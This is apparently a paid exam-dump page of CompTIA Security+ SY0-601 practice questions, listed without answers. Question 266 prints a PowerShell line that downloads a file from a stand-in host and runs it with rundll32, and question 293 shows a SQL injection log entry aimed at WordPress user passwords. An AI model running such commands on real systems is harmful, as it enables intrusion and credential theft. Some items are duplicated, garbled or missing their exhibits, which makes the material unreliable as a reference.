Questions 230

An organization is concerned about hackers potentially entering a facility and plugging in a remotely accessible Kali Linux box. Which of the following should be the first lines of defense against such an attack? (Select TWO)

Options:

A.

MAC filtering

B.

Zero trust segmentation

C.

Network access control

D.

Access control vestibules

E.

Guards

F.

Bollards

Buy Now
Questions 231

A systems administrator is considering different backup solutions for the IT infrastructure. The company is looking for a solution that offers the fastest recovery time while also saving the most amount of storage used to maintain the backups. Which of the following recovery solutions would be the BEST option to meet these requirements?

Options:

A.

Snapshot

B.

Differential

C.

Full

D.

Tape

Buy Now
Questions 232

After gaining access to a dual-homed (i.e.. wired and wireless) multifunction device by exploiting a vulnerability in the device's firmware, a penetration tester then gains shell access on another networked asset This technique is an example of:

Options:

A.

privilege escalation

B.

footprinting

C.

persistence

D.

pivoting.

Buy Now
Questions 233

A security analyst wants to verify that a client-server (non-web) application is sending encrypted traffic. Which of the following should the analyst use?

Options:

A.

openssl

B.

hping

C.

netcat

D.

tcpdump

Buy Now
Questions 234

A security analyst notices several attacks are being blocked by the NIPS but does not see anything on the boundary firewall logs. The attack seems to have been thwarted Which of the following resiliency techniques was applied to the network to prevent this attack?

Options:

A.

NIC Teaming

B.

Port mirroring

C.

Defense in depth

D.

High availability

E.

Geographic dispersal

Buy Now
Questions 235

Which of the technologies is used to actively monitor for specific file types being transmitted on the network?

Options:

A.

File integrity monitoring

B.

Honeynets

C.

Tcpreplay

D.

Data loss prevention

Buy Now
Questions 236

A Chief information Officer is concerned about employees using company-issued laptops to steal data when accessing network shares Which of the following should the company implement?

Options:

A.

DLP

B.

CASB

C.

HIDS

D.

EDR

E.

UEFI

Buy Now
Questions 237

An analyst Is generating a security report for the management team. Security guidelines recommend disabling all listening unencrypted services. Given this output from Nmap:

Which of the following should the analyst recommend to disable?

Options:

A.

21/tcp

B.

22/tcp

C.

23/tcp

D.

443/tcp

Buy Now
Questions 238

An attacker replaces a digitally signed document with another version that goes unnoticed Upon reviewing the document's contents the author notices some additional verbiage that was not originally in the document but cannot validate an integrity issue. Which of the following attacks was used?

Options:

A.

Cryptomalware

B.

Hash substitution

C.

Collision

D.

Phishing

Buy Now
Questions 239

A security engineer is reviewing the logs from a SAML application that is configured to use MFA, during this review the engineer notices a high volume of successful logins that did not require MFA from users who were traveling internationally. The application, which can be accessed without a VPB, has a policy that allows time-based tokens to be generated. Users who changed locations should be required to reauthenticate but have been Which of the following statements BEST explains the issue?

Options:

A.

OpenID is mandatory to make the MFA requirements work

B.

An incorrect browser has been detected by the SAML application

C.

The access device has a trusted certificate installed that is overwriting the session token

D.

The user’s IP address is changing between logins, bur the application is not invalidating the token

Buy Now
Questions 240

Which of the following incident response steps occurs before containment?

Options:

A.

Eradication

B.

Recovery

C.

Lessons learned

D.

Identification

Buy Now
Questions 241

A desktop support technician recently installed a new document-scanning software program on a computer. However, when the end user tried to launch the program, it did not respond. Which of the following is MOST likely the cause?

Options:

A.

A new firewall rule is needed to access the application.

B.

The system was quarantined for missing software updates.

C.

The software was not added to the application whitelist.

D.

The system was isolated from the network due to infected software

Buy Now
Questions 242

The Chief Executive Officer announced a new partnership with a strategic vendor and asked the Chief Information Security Officer to federate user digital identities using SAML-based protocols. Which of the following will this enable?

Options:

A.

SSO

B.

MFA

C.

PKI

D.

OLP

Buy Now
Questions 243

A company uses a drone for precise perimeter and boundary monitoring. Which of the following should be MOST concerning to the company?

Options:

A.

Privacy

B.

Cloud storage of telemetry data

C.

GPS spoofing

D.

Weather events

Buy Now
Questions 244

A Chief Information Security Officer (CISO) is evaluating (he dangers involved in deploying a new ERP system tor the company. The CISO categorizes the system, selects the controls mat apply to the system, implements the controls, and then assesses the success of the controls before authorizing the system Which of the following is the CISO using to evaluate Hie environment for this new ERP system?

Options:

A.

The Diamond Model of Intrusion Analysis

B.

CIS Critical Security Controls

C.

NIST Risk Management Framevtoik

D.

ISO 27002

Buy Now
Questions 245

A store receives reports that shoppers’ credit card information is being stolen. Upon further analysis, those same shoppers also withdrew money from an ATM in that store.

The attackers are using the targeted shoppers’ credit card information to make online purchases. Which of the following attacks is the MOST probable cause?

Options:

A.

Identity theft

B.

RFID cloning

C.

Shoulder surfing

D.

Card skimming

Buy Now
Questions 246

An application owner reports suspicious activity on an internal financial application from various internal users within the past 14 days. A security analyst notices the following:

•Financial transactions were occurring during irregular time frames and outside of business hours by unauthorized users.

•Internal users in question were changing their passwords frequently during that time period.

•A jump box that several domain administrator users use to connect to remote devices was recently compromised.

•The authentication method used in the environment is NTLM.

Which of the following types of attacks is MOST likely being used to gain unauthorized access?

Options:

A.

Pass-the-hash

B.

Brute-force

C.

Directory traversal

D.

Replay

Buy Now
Questions 247

A network analyst is setting up a wireless access point for a home office in a remote, rural location. The requirement is that users need to connect to the access point securely but do not want to have to remember passwords Which of the following should the network analyst enable to meet the requirement?

Options:

A.

MAC address filtering

B.

802.1X

C.

Captive portal

D.

WPS

Buy Now
Questions 248

If a current private key is compromised, which of the following would ensure it cannot be used to decrypt ail historical data?

Options:

A.

Perfect forward secrecy

B.

Elliptic-curve cryptography

C.

Key stretching

D.

Homomorphic encryption

Buy Now
Questions 249

An employee received multiple messages on a mobile device. The messages instructing the employee to pair the device to an unknown device. Which of the following BEST describes What a malicious person might be doing to cause this issue to occur?

Options:

A.

Jamming

B.

Bluesnarfing

C.

Evil twin

D.

Rogue access point

Buy Now
Questions 250

Per company security policy, IT staff members are required to have separate credentials to perform administrative functions using just-in-time permissions. Which of the following solutions is the company Implementing?

Options:

A.

Privileged access management

B.

SSO

C.

RADIUS

D.

Attribute-based access control

Buy Now
Questions 251

A security analyst is investigating a phishing email that contains a malicious document directed to the company's Chief Executive Officer (CEO). Which of the following should the analyst perform to understand the threat and retrieve possible IoCs?

Options:

A.

Run a vulnerability scan against the CEOs computer to find possible vulnerabilities

B.

Install a sandbox to run the malicious payload in a safe environment

C.

Perform a traceroute to identify the communication path

D.

Use netstat to check whether communication has been made with a remote host

Buy Now
Questions 252

Which of the following is the MOST secure but LEAST expensive data destruction method for data that is stored on hard drives?

Options:

A.

Pulverizing

B.

Shredding

C.

Incinerating

D.

Degaussing

Buy Now
Questions 253

Which of the following disaster recovery tests is the LEAST time consuming for the disaster recovery team?

Options:

A.

Tabletop

B.

Parallel

C.

Full interruption

D.

Simulation

Buy Now
Questions 254

The compliance team requires an annual recertification of privileged and non-privileged user access. However, multiple users who left the company six months ago still have access. Which of the following would have prevented this compliance violation?

Options:

A.

Account audits

B.

AUP

C.

Password reuse

D.

SSO

Buy Now
Questions 255

A company has hired an assessment team to test the security of the corporate network and employee vigilance. Only the Chief Executive Officer and Chief Operating Officer are aware of this exercise, and very little information has been provided to the assessors. Which of the following is taking place?

Options:

A.

A red-team test

B.

A white-team test

C.

A purple-team test

D.

A blue-team test

Buy Now
Questions 256

The new Chief Information Security Officer at a company has asked the security learn to implement stronger user account policies. The new policies require:

• Users to choose a password unique to their last ten passwords

• Users to not log in from certain high-risk countries

Which of the following should the security team implement? (Select two).

Options:

A.

Password complexity

B.

Password history

C.

Geolocation

D.

Geospatial

E.

Geotagging

F.

Password reuse

Buy Now
Questions 257

Which of the following best describes the situation where a successfully onboarded employee who is using a fingerprint reader is denied access at the company's mam gate?

Options:

A.

Crossover error rate

B.

False match raw

C.

False rejection

D.

False positive

Buy Now
Questions 258

A company was recently breached. Part of the company's new cybersecurity strategy is to centralize the logs from all security devices. Which of the following components forwards the logs to a central source?

Options:

A.

Log enrichment

B.

Log queue

C.

Log parser

D.

Log collector

Buy Now
Questions 259

A backup operator wants to perform a backup to enhance the RTO and RPO in a highly time- and storage-efficient way that has no impact on production systems. Which of the following backup types should the operator use?

Options:

A.

Tape

B.

Full

C.

Image

D.

Snapshot

Buy Now
Questions 260

A systems engineer thinks a business system has been compromised and is being used to exfiltrated data to a competitor The engineer contacts the CSIRT The CSIRT tells the engineer to immediately disconnect the network cable and to not do anything else Which of the following is the most likely reason for this request?

Options:

A.

The CSIRT thinks an insider threat is attacking the network

B.

Outages of business-critical systems cost too much money

C.

The CSIRT does not consider the systems engineer to be trustworthy

D.

Memory contents including fileles malware are lost when the power is turned off

Buy Now
Questions 261

A security administrator Is managing administrative access to sensitive systems with the following requirements:

• Common login accounts must not be used (or administrative duties.

• Administrative accounts must be temporal in nature.

• Each administrative account must be assigned to one specific user.

• Accounts must have complex passwords.

• Audit trails and logging must be enabled on all systems.

Which of the following solutions should the administrator deploy to meet these requirements?

Options:

A.

ABAC

B.

SAML

C.

PAM

D.

CASB

Buy Now
Questions 262

A security analyst needs to recommend a solution that will allow current Active Directory accounts and groups to be used for access controls on both network and remote-access devices. Which of the

following should the analyst recommend? (Select two).

Options:

A.

TACACS+

B.

RADIUS

C.

OAuth

D.

OpenlD

E.

Kerberos

F.

CHAP

Buy Now
Questions 263

An engineer is using scripting to deploy a network in a cloud environment. Which the following describes this scenario?

Options:

A.

SDLC

B.

VLAN

C.

SDN

D.

SDV

Buy Now
Questions 264

Which of the following can be used to detect a hacker who is stealing company data over port 80?

Options:

A.

Web application scan

B.

Threat intelligence

C.

Log aggregation

D.

Packet capture

Buy Now
Questions 265

A network administrator needs to determine the sequence of a server farm's logs. Which of the following should the administrator consider? (Select two).

Options:

A.

Chain of custody

B.

Tags

C.

Reports

D.

Time stamps

E.

Hash values

F.

Time offset

Buy Now
Questions 266

An employee received an email with an unusual file attachment named Updates . Lnk. A security analysts reverse engineering what the fle does and finds that executes the folowing script:

C:\Windows \System32\WindowsPowerShell\vl.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

Options:

A.

A Powershell code is performing a DLL injection.

B.

A PowerShell code is displaying a picture.

C.

A PowerShell code is configuring environmental variables.

D.

A PowerShell code is changing Windows Update settings.

Buy Now
Questions 267

A company recently upgraded its authentication infrastructure and now has more computing power. Which of the following should the company consider using to ensure user credentials are

being transmitted and stored more securely?

Options:

A.

Blockchain

B.

Salting

C.

Quantum

D.

Digital signature

Buy Now
Questions 268

A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802. IX using the most secure encryption and protocol available.

Perform the following steps:

1. Configure the RADIUS server.

2. Configure the WiFi controller.

3. Preconfigure the client for an

incoming guest. The guest AD

credentials are:

User: guest01

Password: guestpass

Options:

Buy Now
Questions 269

Which of the following describes where an attacker can purchase DDoS or ransomware services?

Options:

A.

Threat intelligence

B.

Open-source intelligence

C.

Vulnerability database

D.

Dark web

Buy Now
Questions 270

A network security manager wants to implement periodic events that will test the security team's preparedness for incidents in a controlled and scripted manner, Which of the following concepts describes this scenario?

Options:

A.

Red-team exercise

B.

Business continuity plan testing

C.

Tabletop exercise

D.

Functional exercise

Buy Now
Questions 271

A police department is using the cloud to share information city officials Which of the cloud models describes this scenario?

Options:

A.

Hybrid

B.

private

C.

pubic

D.

Community

Buy Now
Questions 272

A company is focused on reducing risks from removable media threats. Due to certain primary applications, removable media cannot be entirely prohibited at this time. Which of the following best describes the company's approach?

Options:

A.

Compensating controls

B.

Directive control

C.

Mitigating controls

D.

Physical security controls

Buy Now
Questions 273

A security analyst is reviewing packet capture data from a compromised host On the In the packet capture. analyst locates packets that contain large of text, Which Of following is most likely installed on compromised host?

Options:

A.

Keylogger

B.

Spyware

C.

Torjan

D.

Ransomware

Buy Now
Questions 274

Which of the following would provide guidelines on how to label new network devices as part of the initial configuration?

Options:

A.

IP schema

B.

Application baseline configuration

C.

Standard naming convention policy

D.

Wireless LAN and network perimeter diagram

Buy Now
Questions 275

A security administrator performs weekly vulnerability scans on all cloud assets and provides a detailed report. Which of the following describes the administrator's activities?

Options:

A.

Continuous deployment

B.

Continuous integration

C.

Continuous validation

D.

Continuous monitoring

Buy Now
Questions 276

An organization has been experiencing outages during holiday sales and needs to ensure availability of its point-of-sales systems. The IT administrator has been asked to improve both server-data fault tolerance and site availability under high consumer load. Which of the following are the best options to accomplish this objective? (Select two.)

Options:

A.

Load balancing

B.

Incremental backups

C.

UPS

D.

RAID

E.

Dual power supply

F.

VLAN

Buy Now
Questions 277

Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is successful between the two devices. Which of the following tools should the security analyst use to help identify if the traffic is being blocked?

Options:

A.

nmap

B.

tracert

C.

ping

D.

ssh

Buy Now
Questions 278

A Chief Information Security Officer (CISO) is evaluating the dangers involved in deploying a new ERP system for the company. The CISO categorizes the system, selects the controls that apply to the system, implements the controls, and then assesses the success of the controls before authorizing the system. Which of the following is the CISO using to evaluate the environment for this new ERP system?

Options:

A.

The Diamond Model of Intrusion Analysis

B.

CIS Critical Security Controls

C.

NIST Risk Management Framework

D.

ISO 27002

Buy Now
Questions 279

A company a "right to forgotten" request To legally comply, the company must remove data related to the requester from its systems. Which Of the following Company most likely complying with?

Options:

A.

NIST CSF

B.

GDPR

C.

PCI OSS

D.

ISO 27001

Buy Now
Questions 280

Leveraging the information supplied below, complete the CSR for the server to set up TLS (HTTPS)

• Hostname: ws01

• Domain: comptia.org

• IPv4: 10.1.9.50

• IPV4: 10.2.10.50

• Root: home.aspx

• DNS CNAME:homesite.

Instructions:

Drag the various data points to the correct locations within the CSR. Extension criteria belong in the let hand column and values belong in the corresponding row in the right hand column.

Options:

Buy Now
Questions 281

A company was recently breached Pan of the company's new cybersecurity strategy is to centralize? the togs horn all security devices Which of the following components forwards the logs to a central source?

Options:

A.

Log enrichment

B.

Log queue

C.

Log parser

D.

Log collector

Buy Now
Questions 282

An engineer recently deployed a group of 100 web servers in a cloud environment. Per the security policy, all web-server ports except 443 should be disabled. Which of the following can be

used to accomplish this task?

Options:

A.

Application allow list

B.

Load balancer

C.

Host-based firewall

D.

VPN

Buy Now
Questions 283

Which of the following models offers third-party-hosted, on-demand computing resources that can be shared with multiple organizations over the internet?

Options:

A.

Public cloud

B.

Hybrid cloud

C.

Community cloud

D.

Private cloud

Buy Now
Questions 284

A digital forensics team at a large company is investigating a case in which malicious code was downloaded over an HTTPS connection and was running in memory, but was never committed to disk. Which of the following techniques should the team use to obtain a sample of the malware binary?

Options:

A.

pcap reassembly

B.

SSD snapshot

C.

Image volatile memory

D.

Extract from checksums

Buy Now
Questions 285

A security team is conducting a security review of a hosted data provider. The management team has asked the hosted data provider to share proof that customer data is being appropriately protected.

Which of the following would provide the best proof that customer data is being protected?

Options:

A.

SOC2

B.

CSA

C.

CSF

D.

1SO 31000

Buy Now
Questions 286

Security analysts have noticed the network becomes flooded with malicious packets at specific times of the day. Which of the following should the analysts use to investigate this issue?

Options:

A.

Web metadata

B.

Bandwidth monitors

C.

System files

D.

Correlation dashboards

Buy Now
Questions 287

Which of the following processes would most likely help an organization that has conducted an incident response exercise to improve performance and identify challenges?

Options:

A.

Lessons learned

B.

Identification

C.

Simulation

D.

Containment

Buy Now
Questions 288

While performing a threat-hunting exercise, a security analyst sees some unusual behavior occurring in an application when a user changes the display name. The security analyst decides to perform a static code analysis and receives the following pseudocode:

Which of the following attack types best describes the root cause of the unusual behavior?

Options:

A.

Server-side request forgery

B.

Improper error handling

C.

Buffer overflow

D.

SQL injection

Buy Now
Questions 289

An organization's Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect data, including ensuring backups are properly maintained Which of the following roles would MOST likely include these responsibilities?

Options:

A.

Data protection officer

B.

Data owner

C.

Backup administrator

D.

Data custodian

E.

Internal auditor

Buy Now
Questions 290

A company completed a vulnerability scan. The scan found malware on several systems that were running older versions of Windows. Which of the following is MOST likely the cause of the malware infection?

Options:

A.

Open permissions

B.

Improper or weak patch management

C.

Unsecure root accounts

D.

Default settings

Buy Now
Questions 291

A company wants to enable BYOD for checking email and reviewing documents. Many of the documents contain sensitive organizational information. Which of the following should be deployed first before allowing the use of personal devices to access company data?

Options:

A.

MDM

B.

RFID

C.

DLR

D.

SIEM

Buy Now
Questions 292

A global pandemic is forcing a private organization to close some business units and reduce staffing at others. Which of the following would be best to help the organization's executives determine their next course of action?

Options:

A.

An incident response plan

B.

A communication plan

C.

A disaster recovery plan

D.

A business continuity plan

Buy Now
Questions 293

A security analyst reviews web server logs and notices the following line:

104.35. 45.53 -

[22/May/2020:07 : 00:58 +0100] "GET . UNION ALL SELECT

user login, user _ pass, user email from wp users—— HTTP/I.I" 200 1072 http://www.example.com/wordpress/wp—admin/

Which of the following vulnerabilities is the attacker trying to exploit?

Options:

A.

SSRF

B.

CSRF

C.

xss

D.

SQLi

Buy Now
Questions 294

A data owner has been tasked with assigning proper data classifications and destruction methods for various types of data contained within the environment.

Options:

Buy Now
Questions 295

Stakeholders at an organisation must be kept aware of any incidents and receive updates on status changes as they occur Which of the following Plans would fulfill this requirement?

Options:

A.

Communication plan

B.

Disaster recovery plan

C.

Business continuity plan

D.

Risk plan

Buy Now
Questions 296

Which of the following describes software on network hardware that needs to be updated on a rou-tine basis to help address possible vulnerabilities?

Options:

A.

Vendor management

B.

Application programming interface

C.

Vanishing

D.

Encryption strength

E.

Firmware

Buy Now
Questions 297

A network architect wants a server to have the ability to retain network availability even if one of the network switches it is connected to goes down. Which of the following should the architect implement on the server to achieve this goal?

Options:

A.

RAID

B.

UPS

C.

NIC teaming

D.

Load balancing

Buy Now
Questions 298

A systems analyst is responsible for generating a new digital forensics chain -of- custody form Which of the following should the analyst include in this documentation? (Select two).

Options:

A.

The order of volatility

B.

A forensics NDA

C.

The provenance of the artifacts

D.

The vendor's name

E.

The date and time

F.

A warning banner

Buy Now
Questions 299

A network engineer receives a call regarding multiple LAN-connected devices that are on the same switch. The devices have suddenly been experiencing speed and latency issues while connecting to network resources. The engineer enters the command show mac address-table and reviews the following output

Which of the following best describes the attack that is currently in progress?

Options:

A.

MAC flooding

B.

Evil twin

C.

ARP poisoning

D.

DHCP spoofing

Buy Now
Questions 300

An organization is concerned about hackers potentially entering a facility and plugging in a remotely accessible Kali Linux box. Which of the following should be the first lines of defense against such an attack? (Select TWO).

Options:

A.

MAC filtering

B.

Zero trust segmentation

C.

Network access control

D.

Access control vestibules

E.

Guards

F.

Bollards.

Buy Now
Questions 301

A company has numerous employees who store PHI data locally on devices. The Chief Information Officer wants to implement a solution to reduce external exposure of PHI but not affect the business.

The first step the IT team should perform is to deploy a DLP solution:

Options:

A.

for only data in transit.

B.

for only data at reset.

C.

in blocking mode.

D.

in monitoring mode.

Buy Now
Questions 302

Physical access to the organization's servers in the data center requires entry and exit through multiple access points: a lobby, an access control vestibule, three doors leading to the server floor itself and eventually to a caged area solely for the organization's hardware. Which of the following controls is described in this scenario?

Options:

A.

Compensating

B.

Deterrent

C.

Preventive

D.

Detective

Buy Now
Questions 303

An email security vendor recently added a retroactive alert after discovering a phishing email had already been delivered to an inbox. Which of the following would be the best way for the security administrator to address this type of alert in the future?

Options:

A.

Utilize a SOAR playbook to remove the phishing message.

B.

Manually remove the phishing emails when alerts arrive.

C.

Delay all emails until the retroactive alerts are received.

D.

Ingest the alerts into a SIEM to correlate with delivered messages.

Buy Now
Questions 304

A security administrator would like to ensure all cloud servers will have software preinstalled for facilitating vulnerability scanning and continuous monitoring. Which of the following concepts should the administrator utilize?

Options:

A.

Provisioning

B.

Staging

C.

Development

D.

Quality assurance

Buy Now
Questions 305

Which of the following can reduce vulnerabilities by avoiding code reuse?

Options:

A.

Memory management

B.

Stored procedures

C.

Normalization

D.

Code obfuscation

Buy Now
Questions 306

Sales team members have been receiving threatening voicemail messages and have reported these incidents to the IT security team. Which of the following would be MOST appropriate for the IT security team to analyze?

Options:

A.

Access control

B.

Syslog

C.

Session Initiation Protocol traffic logs

D.

Application logs

Buy Now
Questions 307

A company recently enhanced mobile device configuration by implementing a set of security controls: biometrics, context-aware authentication, and full device encryption. Even with these settings in place, an unattended phone was used by a malicious actor to access corporate data.

Which of the following additional controls should be put in place first?

Options:

A.

GPS tagging

B.

Remote wipe

C.

Screen lock timer

D.

SEAndroid

Buy Now
Questions 308

A company would like to move to the cloud. The company wants to prioritize control and security over cost and ease of management. Which of the following cloud models would best suit this company's priorities?

Options:

A.

Public

B.

Hybrid

C.

Community

D.

Private

Buy Now
Questions 309

After installing a patch On a security appliance. an organization realized a massive data exfiltration occurred. Which Of the following describes the incident?

Options:

A.

Supply chain attack

B.

Ransomware attack

C.

Cryptographic attack

D.

Password attack

Buy Now
Questions 310

Which of the following best describes a tool used by an organization to identi-fy, log, and track any potential risks and corresponding risk information?

Options:

A.

Quantitative risk assessment

B.

Risk register

C.

Risk control assessment

D.

Risk matrix

Buy Now
Questions 311

Which of the following measures the average time that equipment will operate before it breaks?

Options:

A.

SLE

B.

MTBF

C.

RTO

D.

ARO

Buy Now
Questions 312

A security analyst is using OSINT to gather information to verify whether company data is available publicly. Which of the following is the BEST application for the analyst to use?

Options:

A.

theHarvester

B Cuckoo

B.

Nmap

C.

Nessus

Buy Now
Questions 313

A security analyst is investigating a report from a penetration test. During the penetration test, consultants were able to download sensitive data from a back-end server. The back-end server was exposing an API that should have only been available from the company’s mobile application. After reviewing the back-end server logs, the security analyst finds the following entries:

Which of the following is the most likely cause of the security control bypass?

Options:

A.

IP address allow list

B.

User-agent spoofing

C.

WAF bypass

D.

Referrer manipulation

Buy Now
Questions 314

A major manufacturing company updated its internal infrastructure and just started to allow OAuth application to access corporate data Data leakage is being reported Which of following most likely caused the issue?

Options:

A.

Privilege creep

B.

Unmodified default

C.

TLS

D.

Improper patch management

Buy Now
Questions 315

A data cento has experienced an increase in under-voltage events Mowing electrical grid maintenance outside the facility These events are leading to occasional losses of system availability Which of the following would be the most cost-effective solution for the data center 10 implement''

Options:

A.

Uninterruptible power supplies with battery backup

B.

Managed power distribution units lo track these events

C.

A generator to ensure consistent, normalized power delivery

D.

Dual power supplies to distribute the load more evenly

Buy Now
Questions 316

Audit logs indicate an administrative account that belongs to a security engineer has been locked out multiple times during the day. The security engineer has been on vacation (or a few days. Which of the following attacks can the account lockout be attributed to?

Options:

A.

Backdoor

B.

Brute-force

C.

Rootkit

D.

Trojan

Buy Now
Questions 317

Which of the following describes business units that purchase and implement scripting software without approval from an organization's technology Support staff?

Options:

A.

Shadow IT

B.

Hacktivist

C.

Insider threat

D.

script kiddie

Buy Now
Questions 318

A cybersecurity analyst needs to adopt controls to properly track and log user actions to an individual. Which of the following should the analyst implement?

Options:

A.

Non-repudiation

B.

Baseline configurations

C.

MFA

D.

DLP

Buy Now
Exam Code: SY0-601
Exam Name: CompTIA Security+ Exam 2023
Last Update: Dec 21, 2024
Questions: 1063
SY0-601 pdf

SY0-601 PDF

$25.5  $84.99
SY0-601 Engine

SY0-601 Testing Engine

$30  $99.99
SY0-601 PDF + Engine

SY0-601 PDF + Testing Engine

$40.5  $134.99